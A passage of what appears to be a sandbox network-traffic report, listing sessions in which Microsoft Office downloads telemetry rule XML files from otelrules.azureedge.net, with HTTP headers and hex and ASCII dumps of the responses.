                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        107192.168.2.84983213.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:20 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:20 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:20 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1427
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                        ETag: "0x8DC582BE56F6873"
                                                                                                        x-ms-request-id: 74e3375a-501e-00a3-2ad8-49c0f2000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125020Z-r1cf579d7788c742hC1EWRr97n00000002fg000000007dvc
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:20 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        108192.168.2.84983313.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:20 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:21 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:20 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1390
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                        ETag: "0x8DC582BE3002601"
                                                                                                        x-ms-request-id: cd880ea1-701e-0098-43c5-49395f000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125020Z-r1cf579d778x776bhC1EWRdk80000000089g000000008229
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:21 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        109192.168.2.84983413.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:20 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:21 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:21 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1364
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                        ETag: "0x8DC582BEB6AD293"
                                                                                                        x-ms-request-id: 15e9867f-c01e-0046-5804-482db9000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125021Z-r1cf579d7789trgthC1EWRkkfc000000095g000000000hc2
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:21 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        110192.168.2.84983513.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:20 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:21 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:21 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1401
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                        ETag: "0x8DC582BE2A9D541"
                                                                                                        x-ms-request-id: d1a1fe13-d01e-00a1-653f-4935b1000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125021Z-r1cf579d778lntp7hC1EWR9gg400000007wg0000000039mx
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:21 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        111192.168.2.84983613.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:22 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:22 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:22 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1391
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                        ETag: "0x8DC582BDF58DC7E"
                                                                                                        x-ms-request-id: 4c8a77f3-f01e-0020-1a90-49956b000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125022Z-r1cf579d778l2x6lhC1EWRsptc000000017g000000008hy6
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:22 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        112192.168.2.84983713.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:22 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:22 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:22 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1354
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                        ETag: "0x8DC582BE0662D7C"
                                                                                                        x-ms-request-id: 123741ec-101e-008d-5b05-4892e5000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125022Z-r1cf579d778z4wflhC1EWRa3h000000008d00000000057vh
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:22 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        113192.168.2.84983813.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:22 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:23 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:23 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1403
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                        ETag: "0x8DC582BDCDD6400"
                                                                                                        x-ms-request-id: 94f5badb-301e-0000-7603-48eecc000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125023Z-r1cf579d7788pwqzhC1EWRrpd800000008p0000000004xrz
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:23 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        114192.168.2.84983913.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:23 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:23 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:23 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1366
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                        ETag: "0x8DC582BDF1E2608"
                                                                                                        x-ms-request-id: 5f90aa43-701e-0097-6403-48b8c1000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125023Z-r1cf579d778t5c2lhC1EWRce3w00000008zg000000009fha
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:23 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        115192.168.2.84984013.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:23 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:23 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:23 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1399
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                        ETag: "0x8DC582BE8C605FF"
                                                                                                        x-ms-request-id: a762f06e-601e-0084-7004-486b3f000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125023Z-r1cf579d778t5c2lhC1EWRce3w0000000950000000001hus
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:23 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        116192.168.2.84984113.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:24 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:24 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:24 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1362
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                        ETag: "0x8DC582BDF497570"
                                                                                                        x-ms-request-id: 2d97fd60-e01e-000c-7b06-488e36000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125024Z-r1cf579d778dndrdhC1EWR4b240000000810000000004y69
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:24 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        117192.168.2.84984213.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:24 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:25 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:24 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1403
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                        ETag: "0x8DC582BDC2EEE03"
                                                                                                        x-ms-request-id: 91802af7-d01e-0017-0578-49b035000000
